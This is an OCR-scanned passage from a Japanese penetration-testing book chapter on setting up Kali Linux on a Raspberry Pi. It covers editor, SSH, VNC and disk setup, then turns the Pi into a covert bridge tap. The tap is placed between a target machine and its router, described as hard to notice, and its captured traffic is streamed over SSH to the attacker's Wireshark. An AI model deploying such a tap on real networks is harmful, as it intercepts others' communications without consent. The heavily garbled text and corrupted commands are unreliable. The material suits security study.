イン サー トモ ー ド 中 に |:set nocompatible」 を 入力 し ます 。 vi を 起動 する た びに 毎 


回 これ を 入力 する の は 手間 な の で 、vi の 設定 ファ イル を 編集 し ます 。 設 定 ファ イ 
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ル の パス は 、 次 の よう に 入力 し て 確認 で きま す 。 


ィ ー リウ ア ウル: と の リリ ワム ・ 





Kali Pi で は vi を 立ち 上 げ よ うと する と 、Small 版 の vim が 立ち 上 が り ま す 。 ユ ー 
ザー 用 の ファ イル パス は "$HOME/.vimrc" と わか り ま し た ("2) 。root ユ ー ザ ー で 
操作 し て いる の で 、 "root/.vimrc' ファ イル に な り ま す 。 イ ンス トー ル 直 後 は 存在 
し な い の で 、 次 の 内 容 で 新規 作成 し ます 。 


"/root/ .vimrc" フ ァイル 





で vi で [Del] キー と [BackSpace] キー を 用 いて 文字 を 削除 する 

vi の イン サー トモ ー ド に お いて 【Dell キー を 押す と 、|[^?」 と 表示 され て し ま 
いま す 。 ま た 、[BackSpace] キー を 押し て も 文字 が 削除 され ず 、[Ctrll +[h] 
キー で し か 文字 を 削除 で きま せん 。 


2 : 第 2 章 で 作成 し た 仮想 マシ ン の Kali に は 、 Huge 版 の Vim が イン スト ー ル され て いま す 。 Huge 
版 は 、Vim の バー ジョ ン の 中 で も 多く の 機能 が 含ま れ て いま す 。 
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[Dell キー や [BackSpace]」 キー で 文字 を 削除 で きる よう に する に は 、".vimrc" 
ファ イル に 次 の コー ド を 追加 し ます 。 


"/root/ .vimrc" フ ァイル (追加 ) 





1 行 目 の [noremapll は コマ ンド ライ ン モ ー ド と イン サー トモ ー ド で の キー バイ 
ンド を 意味 し ます 。[Dell] キー を 【Ctrl] + [h] キー に 対応 きせ て いま す ("3)。 

2 行 目 は 、 [BackSpace] キー で 削除 で きる も の を 指定 し て いま す 。 indent は 行頭 
の 空白 、eol は 改行 、start は 挿入 モー ド 開 始 位置 より 手前 の 文字 を 意味 し ます 。 


人 @ SSH が 切れ る の を 防ぐ 


と て も 時 間 の か か る 処理 を SSH で 実行 し た り 、SSH で の 操作 を 放置 し た りす る 
と 、SSH が 切れ る こと が あり ます 。 運用 に 支障 が あれ ば 、60 秒 ご と に パケ ッ ト を 
送り SSH が 切れ る こと を 防ぎ ます 。 SSH サ ー バ ー あ る い は SSH ク ライ アン ト の ど 
ちら に も 設定 項目 が あり ます が 、 こ こ で は SSH サ ー バ ー 側 を 設定 し ます 。 


①SSH サー バー の 設定 ファ イル を 編集 する 
"etc/ssh/sshd_config' フ ァイル の 99 行 目 あ た り を 編集 し ます 4)。 





3 : 次 の よう に 編集 し て も 同じ 結果 に な り ま す 。 





「^2] や 「^H| は 制御 コー ド で す 。「[^?| を 入力 する に は 、 [Ctrl] + [Yy] キー を 押し た 後に [Dell 
キー を 入力 し ます 。 「^H」 を 入力 する に は 、 [Ctrl] + [vy] キー を 押し た 後に [Ctrl] + [h] キー 
を 乾 し ます 。 


4 : cat コ マン ド で 行 番号 を 表示 する に は -n オ プシ ョ ン を 使い ます 。yi で 行 番号 を 表示 する に は 
「:set number」、 非 表示 に する に は 「:set nonumber」 を 入力 し ます 。 
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"/etc/ssh/sshd_config" フ ァイル (編集 前 ) 








"/etc/ssh/sshd_config" フ ァイル (編集 後 ) 





ClientAlivelnterval は クラ イア ント に 応答 確認 する 間隔 、ClientAliveCountMax 
は 応答 確認 を 繰り 返す 回 数 で す 。 上 記 の よう に 設定 すれ ば 、60 秒 ご と に クラ イア 
ント を 確認 し 、180 秒 間 (=60 秒 x3 回 ) 応答 が な けれ ば タイ ム ア ウ ト し ます 。 


②SSH を 再起 動 す る 
SSH を 再起 動 し ます 。 





但 root の パス ワー ド を 変更 する 


必要 に 応じ て root の パス ワー ド を 変更 し ます 。 そ の 方 法 は 26 の 「root の パス 
ワー ド を 変更 する 」 を 参照 し て くだ さい 。 


@ ホス ト 名 を 変更 する 

Kalii Pi の プロ ンプ ト は 「root@kali:#] と な っ て いま す 。 これ で は Kali の 仮想 マ 
シン の プロ ンプ ト と 同じ で あり 、 区 別 し に くい と いえ ます 。 

プロ ンプ ト の フォ ー マ ッ ト は 、 環 境 変数 PS1 に セ モッ ト さ れ て いま す 。 そこで 、 
echo コ マン ド を 用 いて 、 ど の よう な 値 が セット され て いる か を 確認 し ます 。 
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Foo て 引 ka11:<# echo "も PS1" 
${debian chroot:+($debian chroot) }\u@yh : \w\$ 


この 値 は /root/.bashrc ファ イル に 記述 され て お り 、bash 起 動 時 に 読み 込ま れ 
て いま す 。 こ の ファ イル を 編集 する か 、export コマ ンド で 環境 変数 PS1 を 変更 す 
る こと で 、 プ ロン プ ト の 表示 を 独自 に 変更 で きま す 。 文字 列 を 変え る だ け で な く 、 
カラ フル に も で きま す 。 

|$ 変 数 名 」 また は | 制 変数 名 | は 、 変 数 展開 と いう も の で す 。 ま た 、 バ ックス 
ラッ シュ か ら 始 まる 特定 の 文字 列 は 、 別 の 文字 列 に 変換 され ます ( 表 9-1)。 詳細 
は 、bash の ペー ジ を 参照 し て くだ さい (%5)。 


表 9-1 分 解 後 の 各 文字 列 





debian_chroot が 定義 され て いれ ば 、 丸 括弧 で 囲ん で 
出力 。 未定 義 な ら 空 文字 列 。 
Sideblan_ChroOE+4$dobkan_ohroot 例え ば 、debian_chroot=foobar と 定義 され て いれ ば 、 
文字 列 [(foobar)] が 表示 され る 。 


その まま @ を か 


ェ ニー の を か 
ーー ルン トディ ンタ トリ の 


UID が 0 (すなわち root) な ら '#、 そ れ 以 外 な ら 5 '$' を 
\$ 中 力 


よっ て 、 ホ スト 名 を 変更 すれ ば 、Kali の 仮想 マシ ン と Kali Pi を 区 別 で きそう で 
す 。 


①) ホ スト 名 を 確認 する 
現状 の ホス ト 名 を 確認 する に は 、hostname コマ ンド を 用 いま す 。 


*5 : https//www.gnu.org/ software/bash/manual/bashref.html#Controlling-the-Prompt 
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(② ホス ト 名 を 変更 する 
ホス ト 名 を 変更 する に は 、"/etc/hostname" ファ イル を 編集 し ます 。 





"/etc/hostname" フ ァイル (編集 前 ) 





"/etc/hostname" フ ァイル (編集 後 ) 





さら に 、"/etc/hosts" ファ イル を 編集 し ます 。 





"/etc/hosts" フ ァイル (編集 前 ) 


"/etc/hosts" フ ァイル (編集 後 ) 








の 
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3)Kali を 再起 動 す る 
Kali を 再起 動 し ます 。SSH ク ライ アン ト は 切断 され ます 。 





(④ プ ロン プ ト の 表示 が 変わ っ た こと を 確認 する 
SSH で 接続 し 直す と 、 プ ロン プ ト の 表示 が 変わ り ま し た 。 ま た 、hostname コマ 
ンド で "kali_pi' と 出力 され まし た 。 


ーー デー ドン ーー アト に / の ーー が すれ ー・ 
ー 陸 アメ 4= ピ アロ の た ン いよ え ャ ウリ 





免 パッ ケー ジリ スト を 更新 する 
次 の コマ ンド で 、 ア ッ プ デー ト 可 能 な パッ ケー ジ の 有無 を チェ ッ ク し て 、 パ ッ 
ケー ジリ ス ト を 更新 し ます 。 





@ VNC で リモ ー ト デス クト ッ プ する 


リモ ー ト デス クト ッ プ を 実現 する 方 法 は 色々 あり ます が 、 こ こ で は VNC を 採用 
し 、VNC サ ー バ ー は xllvnc に し ます 。 


(①x11vnc を イン スト ー ル する 
Kali Pi に VNC サー バー で ある x1lvnc を イン スト ー ル し ます 。 
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2 接続 用 の パス ワー ド を 設定 する 
次 の よう に 入力 し て 、 接 続 用 の パス ワー ド を 設定 し ます 。 


Foot 人 MKa11 p1:<# x11Vnc -Storepasswd 

Enter VNC password: 接続 する た め の パ スワ ー ド を 入力 する 。 こ こ で は "password" と し た 。 
Verify password: 

Mrite password to /root/.vnc/passwd? [y]/n y 計る あ g 嘱 

Password written to: /root/ .vnc/pasSwd 





設定 は "/root/.vnc'" ディ レク トリ に 保存 きれ ます 。 


3)VNC サー バー を 起動 する 
VNC サ ー バ ー で ある xllvnc を 起動 し ます 。 


root@Qka11 pi:< 提 x11vnc -ncache 19 -auth guess -forever -1oop 。」 
-repeat -rfbauth /root/ .vnc/passwd -rfbport 5999 
(ログ が 出力 され る ) 
The VNC desktop is: ka1i pi:9 
PORT=5999 
(この まま に する ) 


-ncache : 描画 の 高速 レベ ル 。 値 に は 6 一 12 を 指定 で きる 。 

- auth : Xauthority フ ァイル を 指定 する 。Xauthority フ ァイル は 、X デ ィ ス プ 
レイ へ アク セス する た め の 資 格 情報 を 保持 し 、 ホ ー ム ディ レク トリ に 
".Xauthority" と いう 形 で 存在 する 。 |-auth guess] と する と 、 
ファ イル を 自動 的 に 特定 し て くれ る 。 

-forever : VNC ク ライ アン ト か ら 切 断 さ れ て 、 セ ッ シ ョ ン が 終わ っ て も 止ま ら な い 。 

-repeat : キー リ ビ ー ト を 有効 に する 。 

-rfbauth : 認証 に 使う パス ワー ド フ ァイル の バス を 指定 する 。 

-rfbport : ボー ト 番 号 を 指定 する 。 


他 に も -allow オプ ショ ン を 使う こと で 、 接 続 で きる 端末 を 制限 で きま す 。 
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4④VNC ク ライ アン ト を イン スト ー ル する 

接続 する 側 に VNC ク ライ アン ト を イン スト ー ル し ます 。 こ こ で は Real VNC 
Viewer を 使い ます 。 
ン 

RealVNC 日 本 語 イ ンス トー ル 版 一 - Vector 

https://wwwyectorco.jP/soft/win95/net/se324464.html 

\ー ト 番号 は 15900+ キ ディスプレイ 番号 ]」 の 値 に な り ま す 。 デ ィ ス プレ イ 番 号 

が 10| で あっ た の で 、 接 続 す る た め の ポ ボー ト 番 号 は 5900 に な り ま す ( 図 9.8) 
サー バー 設定 時 の パス ワー ド を 人 人力 する と 、 接 続 さ れ ま す ( 図 99) 。 


け - 有 用: 13285E 1 叶う 53 ロ ロロ 


VC ほ 縮 店 束 : Amsrs ロ ド 


上 ュ こ っ ぃ て | 237a201。| に Ok] し 4*2c ル 





図 9.8 RealVNC で の 接続 


1 





図 9.9 接続 後 の Kali Pi の デス クト ッ プ 
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これ で GUI の ツー ル を 操作 で きる よう に な り ま し た 。 動作 が 重い 場合 に は 、 
RealVNC の オプ ショ ン で カラ ー レ ベル を 落と し ます 。 少し 表示 が 粗く な り ま す 
が 、 動 作 が スム ー ズ に な り ま す 。 


'5) リモート デ スク トッ プ を 終了 する 
[Ctrl] + [c] キー を 入力 し て 強制 終了 する と 、VNC サ ー バ ー が 止ま り 、 リ モー 
ト デ ス クト ッ プ も 終了 し ます 。 


僅 日 本 語 フ ォ ン ト の イン スト ー ル 
イン ター ネッ ト の Web サ イト に アク セス し て み ま す 。 日 本 語 サ イト に アク セス 
し ます 。 日 本 語 が 表示 され て いれ ば 問題 あり ませ ん 。 も し 文字 化け し た 場合 、 
語 フ ォ ン ト が イン スト ー ル され て いな い 可 能 性 が あり ます ( 図 9-10)。 


| FrontPage - Secunty Aka. x | 十 
を 〇 ① 后 |akademeia.info で | Q seary 倍 白 す 本 
届 Most Visited マ 主 Offensive Secunty Kal Lnux や Kali Docs や MKal Tools 今 Exploit-DB 箇 Aircrack-ng MKali Forums 


@ 


Tin ン LAmmmlmU 


ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ 
ロロ ロ 


ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ 
ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ pusiten@wwsit cem ロ ロロ ロロ ロロ 


4 1 ょ 
ま まま 8 





ロロ ロロ ロロ ロロ ロロ ロロ | ロロ ロロ ロロ ロロ ロロ 
HPE ロロ ロロ ロロ ロロ ロロ ロロ ロロ ロロ HHHH ロ ロロ ロロ ロロ 


1 4u 





図 9-.10 文字 化け し た Web ペ ー ジ 
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そこ で 、 日 本 語 フ ォ ン ト を イン スト ー ル し ます 。 


Poot て ka1i:<# apt 1nstal] fonts-vlgothic -y 


プラ ウザ を 再起 動 し て 、 同 じ Web ペ ー ジ を 表示 し て み ま す 。 す る と 、 文字 化け 
が 解消 され た こと が わか り ま す ( 図 9-11)。 


PHoedfege ・SecUty Ak9.… 、 キ 
を 〇 り 岳 akademela.info | ご | Q Searcn 立 白 # 代 ウ 


癌 | Most Visitedy 証 Offersive Sccurity WMKali Unux WMKali Docs "WMKali Tools w ExpoitDB 得 Arcrack-nd MKali Forum's 





本 ゴゴ イト 
半 で 過 旧 し て いす 人 IF 


サイト は 個人 内 なせ メ モリ イト で す 。 和 の ね くま に 更 由 し て いま すず 。 崩 攻 の 表 語 に 関し で は 佑 丘 で きま せん 。 


科 ヴ イレ の 正則 に つい て ほ マ ソコ ォ メ ミー ジュ ョ ン 呈 る し い は 沼 サ ゴト DD まい 互 を 珍 全 に し て くに さい 。 何 ひ 尊 炒 し た いこ と 人 商 牧 押 同 し た 
いこ と た ば あめ り まし な た らち ら 、 メ ー ル [pairaawammit <sm) く 症 さい 。 


トイ ンコ ォ メ ー シ ジョ ンコ 
し ヨリ イト の ほ まい 万 


重 メ イン コソ テン ジリ 
トコ ンピュータ 請 
トピ ビッ ネン プ 夫 及 
ト 層 号 包 ぼ 

ト WW 学 珠 ほ 


ト 1! 子 まほ テー ーー 
ニニ ーー きき 


」 Pt 。 / テー な 7 す 了 骨 





図 9-11 文字 化け が 解消 され た Web ペ ー ジ 


免 パー ティ ショ ン の リサ イズ 

Kali Pi は 動作 し て いま す が 、 今後 運用 し て いく うえ で この まま で は 問題 が あり 
ます 。 microSD に イメ ー ジ ファ イル を 展開 し た 時 点 で 、 無 駄 な 誰 域 が 生じ て いる 
か ら で す 。 
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①) デ ィ ス ク 容 量 を 表示 する 
df コマ ンド で ディ スク 容量 を 表示 し ます 。 





-h ・ サイ ズ に 応じ て 読み や すい 単位 で 表示 する 。 
--tota1 : 空き 領域 の 合計 も 表示 する 。 


32G バ イト の microSD カ ー ド を 使っ て いる の に 、 合計 サイ ズ が 87G バ イト に 
な っ て いま す 。 こ れ は 未 割り当て の 領域 が ある た めで す 。 ア プリ を 追加 で イン ス 
トー ル し た り 、 キ ャ プチ ャ ファ イル を 保存 し た りす る た め に は 、 パ ー テ ィ シ ョ ン 
を リサ イズ し て 領域 を 無駄 な く 利 用 で きる よう に し な けれ ば な り ま せん (6)。 


6: パー ティ ショ ン を 拡大 し て お か な いと 、apt upgrade コマ ンド の 実行 時 に 空き 容量 が 足り な く 
な り エ ラー が 発生 し て し まい ます 。 
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2 GParted で パー ティ ショ ン を 編集 する 


ここ で は GUI で 動作 する パー ティ ショ ン 探 作 ツ ー ル GParted を 使い ます ( 


まず は イン スト ー ル し ます 。 


Poot@⑳kal1:<# apt 1nstal1 gparted -y 


"7)。 


GParted は GUI ツ ー ル な の で 、VNC で アク セス し て か ら 、 次 を 入力 し ます ( 図 


す -12)。 


Poot@⑳ka11 D1:<# EDarted 


人 る fwted Et yew Dewce mtriow Help 


wi 
】 - 


le ーー on Poem Um_mad re テ 
2cwmmcbitcpl | 六 fet15 も oy 39.3* ま MiB le 
mmrtbtcp っ  。、 還 較 … ぃ cd.9T MIH 


wrwlloc ac unelox rc@ 


円 | 較 中 )Q 円 


図 9.12 GParted を 起動 し た と ころ 





7 : CUI で 操作 する 場合 は 、 fdisk コマ ンド 、parted コマ ンド 、resize2fs コ マン ド な ど を 使い ます 
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dev/mmcblkOp1"( フ ァイル シス テム は FAT16、 マ ウン ト ボ イン ト は "/boot) 
と "/dev/mmcblkO0p2" (ファ イル シス テム は ext4、 マ ウン ト ボ イン ト は 『"/) と い 
う パ ー テ ィ シ ョ ン が あり 、umnallocated ( 未 割り 当て ) の 領域 が あり ます 。「/dev/ 
mmcblkO0p2" の パー ティ ショ ン を 選択 し て 、[Resize/Move] ボタ ン を 押し ます 。 
する と Resize 画 面 が 表示 され る の で 、 右 端 を ドラ ッ グ し て 、 未 割り 当て の 領域 全 
体 ま で 広げ て 、[Resize] ボタ ン を 押し ます ( 図 9-13) 。 





図 9.13 Hesize する と ころ 


unallocated の 領域 が 消え ます 。[Apply] ボタ ン を 押し て 反映 し ます 。 警告 ダイ 
アロ グ が 出 ま す が 、[Apply] ボタ ン を 押す と パー ティ ショ ン へ の 処理 が 実行 され 
ます 。 完了 し た ら 、 人 [Close] ボタ ン を 押し ます 。 処理 が 終了 する と 、 図 9.14 の よう 
に 表示 され ます 。 





図 9-.14 完成 し た パー ティ ショ ン 状 胡 
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これ で パー ティ ショ ン の 編集 は 終わ りな の で 、[x」 ボタ ン を 押し て GParted を 
終了 し ます 。 


3③ 再 び デ ィ ス ク 容 量 を 確認 する 
df コマ ンド を 用 いて 、 合計 サ イズ が 32G バ イト に な っ た こと を 確認 し ます 。 





但 パッ ケー ジ を アッ プ グ レー ド す る 
microSD の 空き 容量 を 増やし た の で 、 パ ッ ケ ー ジ を アッ プ グ レー ド し て も エ 
ラー は 発生 し ませ ん 。 次 を 実行 し て 、 パ ッ ケ ー ジ を アッ プ グ レー ド し ます 。 





この コマ ンド は SSH で は な く 、 物理 モ ニタ ー で 操作 する こと を 推奨 し ます 。apt 
upgrade コ マン ド は 長 時 間 か か り 、 そ の 途中 で SSH が 切断 され て し まう 恐 れ が あ 
る た めで す 。 


借 必要 な ツー ル を イン スト ー ル する 
デフ ォ ル ト で は 基本 的 な ツー ル し か イン スト ー ル され て いま せん 。 例え ば 、 
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nmap、Wireshark、Hydra、Sqlmap、」ohn the Ripper な ど で す 。Metasploit は イ 
ンス トー ル さ れ て いま せん 。 必要 が あれ ば 、 そ の 都度 追加 し ます 。 


人 @ microSD カー ド を バッ クア ッ プ する 
Raspberry Pi の デー タ は すべ て microSD カ ー ド に 格納 され て いま す 。 こ れ を イ 
メー ジフ ァイル と し て パッ クア ッ プ し て お く こ と で 、 後 で いつ で も る 復元 で きま す 。 
また 、 大 き な 容 量 の microSD カー ド に 展開 する 際 に も 役立つ テク ニッ ク で す 。 
microSD カ ー ド を バッ クア ッ プ する 方 法 は 、 次 の 通り で す 。 


①Kali Pi を 終了 する 
Kali Pi を 終了 し ます 。 


FOOot 仙 ka11 pi:<# shutdown -h now 


②)microSD カー ド を 抜い て Windows に 接続 する 
Raspberry Pi の 電源 を 止め 、microSD カー ド を 抜き ます 。 そ し て 、Windows 疾 
末 に 接続 し ます 。 


3③)img ファ イル に バッ クア ッ プ する 

Win32DiskImager を 起動 し ます 。 THImage File に 保存 先 パ ス (ここ で は 、"kalipi_ 
backup20180818img" と し た )、Device に microSD カ ー ド の デバ イス を 指定 し て 、 
[Read] ボタ ン を 押し ます 。 [Write] ボタ ン と 間違え な いよ うに し て くだ さい ( 図 
9-15) 。 


_Jmawe 
C/Uaets/ipwrrr/beskton 洲 alpi packup2019031Rjre 


Ccpy | 同 NMD5 Hsh 


rsi 085 


39.4C05NMB/s 


ューーーーーーーーーーーーーーー 





図 9.15 img フ ァイル に バッ クア ッ プ する 
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生成 し た img フ ァイル は 、 安 全 な 場所 に 保管 し ます 。 


急 日 本 語 キ ー ボ ー ド の レイ アウ ト を 適用 する 


左上 の |Applicationl > 1Settings」 > 「Keyboard」 を 選択 し ます 。 キーボー 

ド の 設定 画面 が 表示 され る の で 、[「Layout」 タブ を 選択 し ます 。 [Use system 
defaults」 の チェ ッ ク を 外し 、Keyboard layout に 「]apanese」 を 追加 し 、 他 の レ 
イア ウト を 消し ます 。 | Keyboard model」 に 適切 な も の が あれ ば 選択 し ます 。 この 
環境 で は な か っ た の で 、 適 当 に Logitech を 選び まし た ( 図 9-16)。 








[ | Use system defaults 
Keyboard model 
Logitech 








Change layout option Compose key 


= コト [ 「 1 


Keyboard layout 
Layout Variant 「 3 








図 9.16 レイ アウ ト を 変更 し た 


実際 に キー 入力 し て 、 期待 通り に 入力 され る こと を 確認 し ます 。 


消 ブリ ッ ジ 化 で パケ ッ ト キ ャ プチ ャ する 

有線 LAN の ハッ キン グ で は 、ARP ス プー フィ ング で アク ティ ブ キ ャ プ チャ を 
実現 し まし た 。Raspberry Pi は 小型 か つ バ バッテリー 駆動 可能 と いう 特徴 を 持ち ま 
す 。 そ の 特徴 を 活か す と 、 タ ー ゲ ダッ ト の ネッ トワ ー ク に 設置 し て も ば れ に くい と 
いえ ます 。 つ まり 、 パ ッ シ プ キャ プチ ャ で も 十分 に ハッ キン グ 可 能 と いう こと で 
す ( 図 9-17)。 
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ーー 攻撃 端 
ター ゲッ ト 端 末 (Kali Pi) 


図 9.17 ブリ ッ ジ 化 で パケ ッ ト キ ャ プチ ャ する 


@ ブリッジ 化 の た め の ハ ー ド ウェ ア の 準備 

オツ ググ デー ゲタ ュ ー ズ や を ブサ リッ ジ 尼 まる も 、 その オッ み ター アミ ー ス で の 通常 の アク 
セス は 切断 され ます 。 そ こ で 、 プ リッ ジ 化 する イン ター フェ ー ス 以外 で ネッ ト 
ワー ク 接 続 す る か 、 物 理 モ ニタ ー か ら 操 作 し て くだ さい 。 こ こ で は 無線 LAN ア ダ 
プター で LAN に 接続 し て 、SSH で 遠隔 操 作 し て いま す 。 


1) 有 線 LAN アダ プター を 追加 する 

ブリッ ジ 化 に は 有線 LAN アダ プター が 2 個 以上 必要 で す 。Raspberry Pi 3 に は 
有線 LAN ア ダ プ ター が 1 つ 備 わっ て いる の で 、USB タ イプ の 有線 LAN ア ダ プ 
ター を 1 つ 追 加 し ます 。 


②) 有 線 LAN アダ プター が 2 つ あ る こと を 確認 する 
ip addr show コマ ンド で 2 つの 有線 LAN ア ダ プ ター の イン ター フェ ー ス が 表示 
され る こと を 確認 し ます 。 


root 細 ka11 _p1:< 井 1p addr show 


で Kali Pi の フリ ッ シ 化 
Kali Pi が 有線 LAN アダ プター を 認識 で きた ら 、 プ リッジ 化 に 取り 掛か り ま す 。 
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①bridge-utils を イン スト ー ル する 
Linux 向け の プリ ッ ジ ユー ティ リティ ー で ある bridge-utils を イン スト ー ル し ま 
す 。 


Poot 引 ka11 p1:<# apt 1nstal1 bridge-ut ュ ls -y 


② プ リッ ジ 化 する 

brctl コ マン ド を 使っ て ブリ ッ ジ 化し ます 。 詳細 は man brctl コ マン ド で 確認 し 
て くだ さい 。 

brctl show コマ ンド で 登録 され た ブリ ッ ジ 名 が 表示 され ます 。 ま だ ブリ ッ ジ 化 
前 な の で 、 何 も 登録 され て いま せん 。 


Foot⑳⑩ka11 pi:<# brct て 1 show 
bridge name bridge 1d STP enabled 1nterfaces 


カラ ム 名 だ け 表 示さ れる 。 


brctl コ マン ド を 使っ て 、 プ リッ ジ 用 の イン ター フェ ー ス を 作り ます 。 


Poot 人 MkKa11 pi:<# brc て 上] addbr evil] bridge 





FootQ⑩Ka11 pi:< 井 DTPc て 上] show ブリ ッ ジ 用 の イン ター フェ ー ス を 作成 。 
bridge name bridge 1d STP enabled interfaces 
evi] bridge 8999 . 999999999999 no 


Poot⑩ka11 pi:<# brct] addif evi] bridge eth9 
FOOt 人 Mka11 pi:<# brct] addif evi] bridge eth1 
root@ka11 pi:<# brct1 show 


bridge name bridge 1d STP enabled interfaces 
evil] bridge 8999 . 999999999999 no eth9 
eth1 


プ ブリッ ジ 用 の イン ター フェ ー ス を 有効 に し ます 。 
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FootQKa11 Di:<# TcCon 和 fig evi] bridge up 
Poot 人 MKa11 pi:<# 1 和 TcConfT1g eth9 9.9.9.9 up 
Foot 人 MKa11 p1:<# 1TConfTig eth1 9.9.9.9 up 
hoot 人 MKa11 pi1:<# 1fTCoOnfig 
eth9: 和 flags=4163<UP , BROADCAST , RUNNTNG, MULTICAST> mtu 1599 
inet6 249d:9:2b97 : cc99 : ba27 : ebff:fe78:81b4 prefixlen .」 
64 scopeid の 9x9<globa]> 
inet6 fe89: : ba27 : ebff:fe78:81b4 prefixlen 64 scopeid .」 
9x29<]inkK> 
ether Db8:27:eb:78:81:b4 txqueuelen 1999 (Ethernet ) 
RX packets 27912 bytes 3812999 (3.6 MiB) 
RX errors 9 dropped 9 overruns 9 frame 9 
TX packets 5991 bytes 622869 (698.2 KB ) 
TX errors 9 dropped 9 overruns 9 carrier 9 col1isions 9 


eth1: flags=4999<UP , BROADCAST , MULTICAST> mtu 1599 
ether 1c:c9:35:91:a6:d1 txqueuelen 1999 (Ethernet ) 
RX packets 9 bytes 9 (9.9 B) 
RX errors 9 dropped 9 overruns 9 frame 9 
TX packets 9 bytes 9 (9.9 B) 
TX errors 9 dropped 9 overruns 9 carrier 9 co]1isions 9 


evi] bridge: 和 †lags=4163<UP , BROADCAST , RUNNTNG , MULTICAST> mtu 1599 

inet6 fe89: : 1ec9:35ff:fe91 :a6d1 prefixlen 64 scopeid .」 
9x29<11nK> 

inet6 249d:9:2b97 : cc の 9 : 1ec9 : 35 和 ff :fe91 :a6d1 prefixlen | 
64 scope1d 9x9<globa] > 

ether 1c:c9:35: の 91:a6:d1 txqueuelen 1999 (Ethernet ) 

RX packets 1936 bytes 197953 (192.4 KiB) 

RX errors 9 dropped 9 overruns 9 frame 9 

TX packets 12 bytes 892 (892.9 B) 

TX errors 9 dropped 9 overruns 9 carrier 9 col1isions 9 


( 略 ) 
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ブリ ッ ジ が 完全 に 起動 する まで に 少し 時 間 が か か り ま す C8)。 


③Kali Pi を 設置 する 

Kali Pi を ター ゲッ ト 端 末 と ルー ター の 間 に 挿 入 す る 形 で 設置 し ます 。 ス イッ チ 
ング ハブ が 存在 する 場合 は 、 ル ー タ ー に 寄せ た 方 が 収集 で きる パケ ッ ト を 増やせ 
ます 。 

設置 後 、 ター ゲッ ト 端 末 が 通信 で きる こと を 確認 し ます 。 ここ で は -t オ プシ ョ ン 
を 指定 し て 、 止 め る まで ルー ター に 対し て Ping を し 続け ます 。 





(④ ブ リッジ 化 で き て いる こと を 確認 する 
tshark で パケ ッ ト キ ャ プチ ャ し て 、 プ リッ ジ 化 で き て いる こと を 確認 し ます 。 





ログ が 流れ 続け て いれ ば 成功 で す 。 タ ー ゲ ッ ト 上 端末 と ルー ター の IP アド レス を 
含む 、Ping の パケ ッ ト (ICMP 要 求 や ICMP 応 答 ) を 確認 で きる は ず で す 。 ま た 、 
ター ゲッ ト 端 末 で イン ター ネッ ト の Web サ イト を 閲覧 する と 、 ロ グ が 急激 に 流れ 
ます 。 


⑤ マル チキ ャ スト パケ ッ ト が 破 臣 され な いよ うに する 
不要 と 思わ れ た マル チキ ャ スト パケ ッ ト は 、 捨 て らち られ て し まい ます 。 こ れ を 回 


8 : 状態 の 局 移 は 「disabled 三 listening 三 learning 三 propagating 三 forwarding」 に な り ま す 。 須 
移 を 確認 し た い 場 合 は 、 事 前 に ログ を 流し て お きま す 。 








| 第 9 章 | 物理 デパ イス の 追加 707 


避 す る た め に 、 無 条件 に マル チキ ャ スト パケ ッ ト を 中 継 す る よう に し ます 。 そ の 
た め に は 、1IGMP snooping 機 能 は 無効 に し て お きま す 。bridge-utils は まだ 対応 し 
て いな い の で 、 設定 ファ イル を 変更 し ます 。"/sys/devices/Yyirtual/net/evil_ 
bridge/bridge/multicast_snooping ファ イル の 内 容 を 1 か ら 0 に し ます 。 


root@ka11 pi:<# echo 9 > /sys/devices/virtua1/net/evi1] bridge/.」 
bridge/multicast snoop1ng 


6⑥ フ リッ ジ 化 を 止め る 

ブリ ッ ジ 化 を 止め る 場合 に は 、 再 起動 する の が 一 番 簡 単 で す C9)。 イ ンタ ー 
フェ ー ス evil bridge も 消え 、"/sys/devices/virtual/net/evil_ bridge'" ディ レク ト 
リ も 消え ます 。 


@ リモ ー ト か ら の リア ル タ イ ム 監 視 

SSH で ログ イン し た まま 、 キ ャ プチ ャ 病 果 を tail で 監視 で きま す 。 し か し tail で 
は ログ の 流れ が 速く て 、 解 析 ・ 監 視 に は 向き ませ ん 。 キ ャ プチ ャ 結果 を ファ イル 
に 記録 し て 、 Wireshark で 読み 込む の が よい で し ょ う 。 し か し 、 Raspberry Pi 上 で 
Wireshark を 起動 する べき で は あり ませ ん 。 キ ャ プチ ャ は 継続 され て お り 、 な お か 
つ Wireshark は 決し て 軽い アプ リ で は な いか ら で す 。 


①)tcpdump を イン スト ー ル する 

KaliPi に お ける パケ ッ ト キ ャ プチ ャ は tcpdump に 任せ ます 。 その た め 、 
tcpdump を 事前 に イン スト ー ル し ます 。 

Foot 同 ka11 D1:< 攻 apt 1nstal] tcpdump -y 
②)Windows の Wireshark で 読み 込む 


Windows 側 か ら SSH で 接続 し て 、pcap ファ イル を 遠隔 で 読み 込み 、 Windows の 


9 : 実際 の ハッ キン グ で は 、 Kali Pi の 起動 時 に 、 自動 で プリ ッ ジ 化す る スク リプ ト を 用 意 し ます 。 
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Wireshark で 読み 込む せよ うに し ます (10)。 コ マン ド プ ロン プ ト は 管理 者 権限 で 起 
動 し て 、 次 を 入力 し ます 。 


C:\Mindows\system32>"C:\Program Files (x86)\At1assian\SourceTree。」 
\too1s\putty\p1ink.exe" -ssh -pw toor root@192 .168.1.5 "tcpdump -ni 
evi] bridge -s 9 -w - not port 22" | "C:\Program Files\Mireshark。」 
\wireshark.exe" -K -1 - 


-k : 起動 し て か ら す ぐに キャ プチ ャ を 始め る 。 
- ュ c イン ター フ ェ ー ス を 指定 する 。 | -3 -」 で 標準 入力 か ら 読 み 込む 。 


この 方 法 で あれ ば 、 手 動 で Kali Pi に SSH ク ライ アン ト で アク セス し て 、 パ ケッ 
トキ ャ プチ ャ ソフ ト を 起動 する 必要 は あり ませ ん 。 SSH を 通じ て コマ ンド を 送り 
込ん で いる た めで す 。 


⑬ フ ァイル に 保存 する 

ファ イル に 保存 し た けれ ば 、Windows 側 の Wireshark で 「 停 止 ]」 アイ コン を 押 
し て か ら 、 フ ァイル に 保存 し ます 。 

Wireshark を 終了 する と 、 コ マン ド プ ロン プ ト に 「Unable to write to standard 
